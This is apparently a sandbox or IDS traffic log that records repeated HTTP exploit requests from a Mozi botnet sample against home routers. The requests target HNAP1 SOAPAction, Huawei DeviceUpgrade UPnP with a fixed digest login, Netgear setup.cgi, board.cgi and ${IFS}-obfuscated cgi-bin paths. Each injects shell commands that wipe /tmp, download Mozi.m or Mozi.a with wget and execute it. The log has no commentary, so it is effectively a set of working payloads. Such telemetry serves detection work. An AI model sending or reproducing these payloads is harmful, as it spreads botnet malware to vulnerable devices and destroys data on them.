                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 135.72.135.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 220.235.116.138:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 196.196.81.227:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 198.219.16.2:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 158.70.45.62:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 144.141.113.17:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 139.132.16.58:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
